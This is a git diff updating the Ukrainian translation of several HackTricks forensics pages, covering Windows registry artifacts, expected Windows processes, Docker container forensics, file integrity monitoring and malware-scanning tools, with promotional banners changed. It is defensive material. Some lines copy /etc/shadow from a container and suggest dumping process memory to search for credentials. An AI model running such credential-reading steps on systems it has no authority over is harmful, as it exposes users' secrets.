`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` та конкретних шляхах версій Office. +### **Нещодавні документи та файли Office** +- Недавні документи та файли Office, до яких зверталися, відзначені в `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` та конкретні шляхи версій Office. ### **Останні використані (MRU) елементи** - Списки MRU, що вказують на останні шляхи файлів та команд, зберігаються в різних підключеннях `ComDlg32` та `Explorer` під `NTUSER.DAT`. ### **Відстеження активності користувача** -- Функція User Assist реєструє детальну статистику використання програм, включаючи кількість запусків та час останнього запуску, в **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. +- Функція User Assist веде детальну статистику використання програм, включаючи кількість запусків та час останнього запуску, в **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. ### **Аналіз Shellbags** -- Shellbags, які розкривають деталі доступу до папок, зберігаються в `USRCLASS.DAT` та `NTUSER.DAT` під `Software\Microsoft\Windows\Shell`. Використовуйте **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** для аналізу. +- Shellbags, що розкривають деталі доступу до папок, зберігаються в `USRCLASS.DAT` та `NTUSER.DAT` під `Software\Microsoft\Windows\Shell`. Використовуйте **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** для аналізу. ### **Історія USB-пристроїв** - **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** та **`HKLM\SYSTEM\ControlSet001\Enum\USB`** містять багато деталей про підключені USB-пристрої, включаючи виробника, назву продукту та часи підключення. - Користувач, пов'язаний з певним USB-пристроєм, може бути визначений шляхом пошуку уламків `NTUSER.DAT` для **{GUID}** пристрою. -- Останній підключений пристрій та його серійний номер тома можна відстежити через `System\MountedDevices` та `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, відповідно. +- Останній підключений пристрій та його серійний номер тома можна відстежити через `System\MountedDevices` та `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` відповідно. -Цей посібник узагальнює важливі шляхи та методи доступу до детальної інформації про систему, мережу та активність користувача в системах Windows, спрямований на зрозумілість та використовуваність. +Цей посібник узагальнює важливі шляхи та методи доступу до детальної інформації про систему, мережу та активність користувача в системах Windows, спрямований на зрозумілість та зручність використання. + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакінг-прийоми, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. + +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md index bc30e48b8..28d847720 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md +++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md @@ -1,22 +1,23 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (Експерт з червоної команди AWS HackTricks)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## smss.exe **Менеджер сеансів**.\ -Сеанс 0 запускає **csrss.exe** та **wininit.exe** (**служби ОС**), тоді як сеанс 1 запускає **csrss.exe** та **winlogon.exe** (**сеанс користувача**). Однак ви повинні бачити **лише один процес** цього **бінарного файлу без дочірніх процесів у дереві процесів**. +Сеанс 0 запускає **csrss.exe** та **wininit.exe** (**служби ОС**), тоді як сеанс 1 запускає **csrss.exe** та **winlogon.exe** (**сеанс користувача**). Однак ви повинні бачити **лише один процес** цього **виконуваного файлу без дочірніх процесів у дереві процесів**. Також, сеанси, відмінні від 0 та 1, можуть означати, що відбуваються сеанси RDP. @@ -24,39 +25,39 @@ ## csrss.exe **Процес підсистеми клієнт-сервер**.\ -Він керує **процесами** та **потоками**, робить доступними **API Windows** для інших процесів, а також **відображає літери диска**, створює **тимчасові файли** та обробляє **процес завершення роботи**. +Він керує **процесами** та **потоками**, робить **Windows API** доступним для інших процесів, а також **відображає літери диска**, створює **тимчасові файли** та обробляє **процес завершення роботи**. -Є один **запущений в сеансі 0 та ще один в сеансі 1** (таким чином, **2 процеси** у дереві процесів). Ще один створюється **на кожен новий сеанс**. +Є один **запущений у Сеансі 0 та ще один у Сеансі 1** (тобто **2 процеси** у дереві процесів). Ще один створюється **для кожного нового сеансу**. ## winlogon.exe **Процес входу в Windows**.\ -Він відповідає за вхід/вихід користувача. Він запускає **logonui.exe**, щоб запитати ім'я користувача та пароль, а потім викликає **lsass.exe**, щоб їх перевірити. +Він відповідає за вхід/вихід користувача. Запускає **logonui.exe**, щоб запросити ім'я користувача та пароль, а потім викликає **lsass.exe**, щоб їх перевірити. Потім він запускає **userinit.exe**, який вказаний у **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** з ключем **Userinit**. -Крім того, попередній реєстр повинен містити **explorer.exe** у ключі **Shell** або його можна використовувати як **метод постійства шкідливого ПЗ**. +Крім того, попередній реєстр повинен містити **explorer.exe** у ключі **Shell**, інакше його можна використовувати як **метод постійства шкідливого ПЗ**. ## wininit.exe **Процес ініціалізації Windows**. \ -Він запускає **services.exe**, **lsass.exe** та **lsm.exe** в сеансі 0. Повинен бути лише 1 процес. +Запускає **services.exe**, **lsass.exe** та **lsm.exe** у Сеансі 0. Повинен бути лише 1 процес. ## userinit.exe **Додаток входу користувача**.\ -Завантажує **ntduser.dat в HKCU** та ініціалізує **середовище користувача** та запускає **скрипти входу** та **GPO**. +Завантажує **ntduser.dat у HKCU** та ініціалізує **середовище користувача** та запускає **скрипти входу** та **GPO**. -Він запускає **explorer.exe**. +Запускає **explorer.exe**. ## lsm.exe **Локальний менеджер сеансів**.\ -Він працює з smss.exe для маніпулювання користувацькими сеансами: вхід/вихід, запуск оболонки, блокування/розблокування робочого столу тощо. +Працює з smss.exe для маніпулювання користувацькими сеансами: вхід/вихід, запуск оболонки, блокування/розблокування робочого столу тощо. Після W7 lsm.exe був перетворений на службу (lsm.dll). @@ -68,21 +69,21 @@ **Менеджер керування службами**.\ Він **завантажує** **служби**, налаштовані як **автозапуск**, та **драйвери**. -Це батьківський процес **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** та багато інших. +Це батьківський процес для **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** та багатьох інших. -Служби визначаються в `HKLM\SYSTEM\CurrentControlSet\Services`, а цей процес підтримує в пам'яті базу даних служб, яку можна опитати за допомогою sc.exe. +Служби визначаються в `HKLM\SYSTEM\CurrentControlSet\Services`, і цей процес підтримує базу даних у пам'яті з інформацією про служби, яку можна опитати за допомогою sc.exe. -Зверніть увагу, як **деякі** **служби будуть працювати в **власному процесі** інші будуть **використовувати процес svchost.exe**. +Зверніть увагу, що **деякі** **служби будуть працювати у власному процесі**, а інші **будуть використовувати процес svchost.exe**. Повинен бути лише 1 процес. ## lsass.exe -**Підсистема локальної безпеки**.\ +**Підсистема локальної безпеки авторитету**.\ Він відповідає за **аутентифікацію користувача** та створення **токенів безпеки**. Він використовує пакети аутентифікації, розташовані в `HKLM\System\CurrentControlSet\Control\Lsa`. -Він записує в **журнал подій безпеки** і повинен бути лише 1 процес. +Він записує в **журнал подій безпеки**, і повинен бути лише 1 процес. Пам'ятайте, що цей процес часто атакується для вилучення паролів. @@ -90,22 +91,22 @@ ## svchost.exe **Загальний процес хостингу служб**.\ -Він розміщує кілька служб DLL в одному спільному процесі. +Він розміщує кілька служб DLL у одному спільному процесі. -Зазвичай ви побачите, що **svchost.exe** запускається з прапорцем `-k`. Це запустить запит до реєстру **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost**, де буде ключ з вказаним аргументом у -k, який міститиме служби для запуску в одному процесі. +Зазвичай ви побачите, що **svchost.exe** запускається з прапорцем `-k`. Це запустить запит до реєстру **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost**, де буде ключ з вказаним аргументом у `-k`, який міститиме служби для запуску в одному процесі. Наприклад: `-k UnistackSvcGroup` запустить: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` -Якщо також використовується **прапорець `-s`** з аргументом, то svchost запитується запустити **лише вказану службу** в цьому аргументі. +Якщо також використовується **прапорець `-s`** з аргументом, то svchost запитується запустити **лише вказану службу** у цьому аргументі. -Буде кілька процесів `svchost.exe`. Якщо який-небудь з них **не використовує прапорець `-k`**, то це дуже підозріло. Якщо ви виявите, що **services.exe не є батьківським процесом**, це також дуже підозріло. +Буде кілька процесів `svchost.exe`. Якщо який-небудь з них **не використовує прапорець `-k`**, це дуже підозріло. Якщо ви виявите, що **services.exe не є батьківським процесом**, це також дуже підозрливо. ## taskhost.exe Цей процес діє як хост для процесів, що працюють з DLL. Він також завантажує служби, які працюють з DLL. -У W8 це називається taskhostex.exe, а в W10 - taskhostw.exe. +У W8 це називається taskhostex.exe, а у W10 - taskhostw.exe. ## explorer.exe @@ -119,12 +120,26 @@ # Виявлення шкідливих процесів -* Чи він працює з очікуваного шляху? (Жоден бінарний файл Windows не працює з тимчасового місця розташування) +* Чи він запущений з очікуваного шляху? (Жоден виконуваний файл Windows не запускається з тимчасового місця розташування) * Чи він спілкується з дивними IP-адресами? * Перевірте цифрові підписи (артефакти Microsoft повинні бути підписані) * Чи правильно написано? -* Чи працює під очікуваним SID? +* Чи виконується під очікуваним SID? * Чи батьківський процес є очікуваним (якщо є)? * Чи дочірні процеси є очікуваними? (немає cmd.exe, wscript.exe, powershell.exe..?) + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub. +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md index 3a1299202..6d2067f3d 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md @@ -1,18 +1,19 @@ -# Форензіка Docker +# Форензика Docker + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Зміна контейнера @@ -22,7 +23,7 @@ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` -Ви можете легко **знайти модифікації, внесені до цього контейнера щодо зображення**, за допомогою: +Ви легко можете **знайти модифікації, внесені до цього контейнера щодо зображення**, за допомогою: ```bash docker diff wordpress C /var @@ -36,7 +37,7 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` -У попередній команді **C** означає **Змінено**, а **A,** **Додано**. Якщо ви виявите, що якийсь цікавий файл, наприклад, `/etc/shadow`, був змінений, ви можете завантажити його з контейнера, щоб перевірити наявність зловмисної діяльності за допомогою: +У попередній команді **C** означає **Змінено**, а **A,** **Додано**. Якщо ви виявите, що який-небудь цікавий файл, наприклад `/etc/shadow`, був змінений, ви можете завантажити його з контейнера, щоб перевірити наявність зловмисної діяльності за допомогою: ```bash docker cp wordpress:/etc/shadow. ``` @@ -59,13 +60,13 @@ container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` -Потім ви можете **розпакувати** зображення та **отримати доступ до блобів**, щоб шукати підозрілі файли, які ви могли знайти в історії змін: +Після цього ви можете **розпакувати** зображення та **отримати доступ до кульок**, щоб шукати підозрілі файли, які ви могли знайти в історії змін: ```bash tar -xf image.tar ``` ### Базовий аналіз -Ви можете отримати **базову інформацію** з образу, який запущено: +Ви можете отримати **базову інформацію** з образу, що працює: ```bash docker inspect ``` @@ -80,7 +81,7 @@ dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` ### Занурення -Для пошуку доданих/змінених файлів в образах Docker ви також можете використовувати утиліту [**dive**](https://github.com/wagoodman/dive) (завантажте її з [**релізів**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)): +Для пошуку доданих/змінених файлів в образах Docker ви також можете використовувати [**dive**](https://github.com/wagoodman/dive) (завантажте його з [**релізів**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)): ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ @@ -89,9 +90,9 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` -Це дозволяє вам **переміщатися між різними блоками образів Docker** та перевіряти, які файли були змінені/додані. **Червоний** означає додано, а **жовтий** - змінено. Використовуйте **Tab**, щоб перейти до іншого виду, та **пробіл**, щоб згорнути/розгорнути папки. +Це дозволяє вам **переміщатися між різними блоками образів Docker** та перевіряти, які файли були змінені/додані. **Червоний** означає додано, а **жовтий** - змінено. Використовуйте **Tab**, щоб перейти до іншого виду, та **Пробіл**, щоб згорнути/розгорнути папки. -За допомогою цієї команди ви не зможете отримати доступ до вмісту різних етапів зображення. Для цього вам потрібно **розпакувати кожен шар та отримати до нього доступ**.\ +За допомогою die ви не зможете отримати доступ до вмісту різних етапів зображення. Для цього вам потрібно **розпакувати кожен шар та отримати до нього доступ**.\ Ви можете розпакувати всі шари зображення з каталогу, де було розпаковано зображення, виконавши: ```bash tar -xf image.tar @@ -99,6 +100,6 @@ for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; don ``` ## Облікові дані з пам'яті -Зверніть увагу, що коли ви запускаєте контейнер Docker всередині хоста **ви можете бачити процеси, що працюють у контейнері з хоста**, просто запустивши `ps -ef` +Зверніть увагу, що коли ви запускаєте контейнер Docker всередині хоста **ви можете бачити процеси, що працюють в контейнері з хоста**, просто запустивши `ps -ef` -Отже (як root) ви можете **витягти пам'ять процесів** з хоста та шукати **облікові дані** просто [**як у наступному прикладі**](../../linux-hardening/privilege-escalation/#process-memory). +Отже (як root) ви можете **вивантажити пам'ять процесів** з хоста та шукати **облікові дані** просто [**як у наступному прикладі**](../../linux-hardening/privilege-escalation/#process-memory). diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md index 0e50a9940..e2a99eaad 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,28 +1,29 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} # Базовий рівень Базовий рівень полягає в створенні знімка певних частин системи для **порівняння з майбутнім станом для виявлення змін**. -Наприклад, ви можете обчислити та зберегти хеш кожного файлу файлової системи, щоб виявити, які файли були змінені.\ +Наприклад, можна обчислити та зберегти хеш кожного файлу файлової системи, щоб виявити, які файли були змінені.\ Це також можна зробити з створеними обліковими записами користувачів, запущеними процесами, запущеними службами та будь-чим іншим, що не повинно змінюватися або змінюватися мало. ## Моніторинг Цілісності Файлів -Моніторинг цілісності файлів (FIM) є критичною технікою безпеки, яка захищає ІТ-середовища та дані, відстежуючи зміни в файлах. Він включає два ключові кроки: +Моніторинг цілісності файлів (FIM) - це критична техніка безпеки, яка захищає ІТ-середовища та дані, відстежуючи зміни в файлах. Вона включає два ключові кроки: 1. **Порівняння з базовим рівнем:** Встановлення базового рівня за допомогою атрибутів файлів або криптографічних контрольних сум (наприклад, MD5 або SHA-2) для майбутніх порівнянь для виявлення модифікацій. 2. **Сповіщення про зміни в реальному часі:** Отримуйте миттєві сповіщення, коли файли доступні або змінені, зазвичай за допомогою розширень ядра ОС. @@ -37,16 +38,17 @@ * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md index f18f990c8..6c833ea9c 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md @@ -1,24 +1,25 @@ # Аналіз шкідливих програм +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} ## Шпаргалки з форензики [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/) -## Онлайн сервіси +## Онлайн-сервіси * [VirusTotal](https://www.virustotal.com/gui/home/upload) * [HybridAnalysis](https://www.hybrid-analysis.com) @@ -26,7 +27,7 @@ * [Intezer](https://analyze.intezer.com) * [Any.Run](https://any.run/) -## Офлайн антивірусні та інструменти виявлення +## Офлайн-антивірусні та інструменти виявлення ### Yara @@ -69,7 +70,7 @@ clamscan folderpath #Scan the whole folder ``` ### [Capa](https://github.com/mandiant/capa) -**Capa** виявляє потенційно шкідливі **можливості** в виконуваних файлах: PE, ELF, .NET. Таким чином, він знайде такі речі, як тактики Att\&ck або підозрілі можливості, такі як: +**Capa** виявляє потенційно шкідливі **можливості** в виконуваних файлах: PE, ELF, .NET. Таким чином, він знайде такі речі, як тактика Att\&ck або підозрілі можливості, такі як: * перевірка помилки OutputDebugString * запуск як служба @@ -80,7 +81,7 @@ clamscan folderpath #Scan the whole folder ### IOCs IOC означає Індикатор Компрометації. IOC - це набір **умов, які ідентифікують** деяке потенційно небажане програмне забезпечення або підтверджене **шкідливе програмне забезпечення**. Команди Blue використовують цей тип визначення для **пошуку цього типу шкідливих файлів** у своїх **системах** та **мережах**.\ -Дуже корисно ділитися цими визначеннями, оскільки коли шкідливе програмне забезпечення ідентифікується на комп'ютері і створюється IOC для цього шкідливого програмного забезпечення, інші команди Blue можуть використовувати його для швидшої ідентифікації шкідливого програмного забезпечення. +Дуже корисно ділитися цими визначеннями, оскільки коли шкідливе програмне забезпечення ідентифікується на комп'ютері і створюється IOC для цього шкідливого програмного забезпечення, інші Команди Blue можуть використовувати його для ідентифікації шкідливого програмного забезпечення швидше. Інструмент для створення або зміни IOCs - [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ Ви можете використовувати інструменти, такі як [**Redline**](https://www.fireeye.com/services/freeware/redline.html) для **пошуку визначених IOCs на пристрої**. @@ -102,9 +103,9 @@ Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files 4. C2 Back Connect Check Compares process connection endpoints with C2 IOCs (new since version v.10) ``` -### Linux Malware Detect +### Виявлення шкідливих програм для Linux -[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) - це програма для виявлення шкідливих програм для Linux, що випущена під ліцензією GNU GPLv2, яка розроблена для боротьби з загрозами, з якими стикаються в спільних хостингових середовищах. Вона використовує дані про загрози з систем виявлення вторгнень на мережевому краю для вилучення шкідливих програм, які активно використовуються в атаках, та генерує підписи для виявлення. Крім того, дані про загрози також походять від користувачів за допомогою функції перевірки LMD та ресурсів спільноти щодо шкідливих програм. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) - це програма для виявлення шкідливих програм для Linux, яка випущена під ліцензією GNU GPLv2 і призначена для виявлення загроз, з якими стикаються в спільних хостингових середовищах. Вона використовує дані про загрози з систем виявлення вторгнень на мережевому краю для вилучення шкідливих програм, які активно використовуються в атаках, та генерує підписи для виявлення. 